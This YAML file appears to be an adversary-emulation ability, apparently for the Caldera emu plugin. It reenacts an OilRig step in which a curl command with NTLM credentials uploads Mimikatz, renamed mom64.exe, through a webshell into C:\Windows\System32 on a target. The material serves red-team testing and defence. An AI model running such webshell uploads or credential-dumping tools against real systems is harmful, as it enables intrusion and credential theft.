ability_id: 98279c81-d5a0-4ec4-9d40-a6e87d1f9bd2
access: {}
additional_info: {}
buckets:
- command-and-control
delete_payload: true
description: OilRig uses the webshell to download Mimikatz as mom64.exe to WATERFALLS
executors:
- additional_info: {}
  build_target: null
  cleanup: []
  code: null
  command: curl -s --http1.1 --ntlm -u '#{network.domain.name}\#{initial.target.user}:#{initial.target.password}'
    -k -X POST -F "upl=f1" -F 'sav=C:\Windows\System32' -F "vir=false" -F "nen=mom64.exe"
    -F 'f1=@m64.exe' https://#{second.target.host}/ews/contact.aspx
  language: null
  name: sh
  parsers: []
  payloads:
  - m64.exe
  platform: linux
  timeout: 60
  uploads: []
  variations: []
name: OilRig Downloads mom64.exe
plugin: emu
privilege: ''
repeatable: false
requirements: []
singleton: false
tactic: command-and-control
technique_id: T1105
technique_name: Ingress Tool Transfer
